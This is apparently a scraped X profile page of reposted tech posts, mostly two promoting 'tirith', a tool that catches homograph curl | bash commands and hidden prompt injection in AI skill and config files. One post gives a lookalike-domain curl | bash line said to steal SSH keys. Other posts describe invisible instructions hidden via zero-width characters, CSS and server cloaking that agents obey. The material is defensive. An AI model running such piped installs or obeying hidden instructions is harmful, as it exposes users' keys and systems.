
Calvin | Impossible is always BUIDLing
17K posts

Calvin | Impossible is always BUIDLing
@calchulus
Year 6 @impossible_ Prev @binanceresearch '18-'21 finished all econ credits @uchicago in two years AMA






My new black & white dock. I love it!









In the next version of Claude Code.. We're introducing two new Skills: /simplify and /batch. I have been using both daily, and am excited to share them with everyone. Combined, these kills automate much of the work it used to take to (1) shepherd a pull request to production and (2) perform straightforward, parallelizable code migrations.


Trust Wallet 🤝 AI → MCP server for instant access to TW docs → Open-source Claude Code skills marketplace → AI skills baked into our libraries Built for devs now. Users next 👀 More here: developer.trustwallet.com

Be honest. When was the last time you actually read a command before pasting it into your terminal? Because these two lines look identical: curl -sSL https://install.example-cli | bash curl -sSL https://іnstall.example-clі | bash One installs your tool. The other steals your SSH keys. That і? Cyrillic. Not Latin. Your browser would block it. Your terminal doesn't even blink. Vibe coding made this 100x worse. Everyone's pasting commands from ChatGPT and random repos like it's nothing. We're all one bad curl | bash away from losing everything. So I built the fix: "tirith". Invisible shell hook. Catches homograph attacks, ANSI injection, hidden commands, dotfile overwrites before they execute. 30 rules. Local only. No telemetry. github.com/sheeki03/tirith

The skills files for your AI can contain invisible instructions that only your AI agent can read. You’ll never see them. Your agent will obey them. Everyone’s worried about AI taking their job. Nobody’s worried about what their AI agent is actually executing. After almost ~2k @github stars, shipped even more Tirith detection, along with other features: - Scans AI config files for hidden prompt injection - Catches zero-width characters hiding instructions from you - Detects servers cloaking content: showing one thing to your browser, another to your AI - MCP server with 7 tools your agent calls before executing anything - Hidden content detection: CSS hiding, zero-font tricks, and content in web pages only your AI can read - One-command setup for Claude Code, Cursor, Codex, VS Code, Windsurf - Env hijacking, proxy injection, PATH manipulation detection Free & Open source. Did you ever audit your AI config files before?








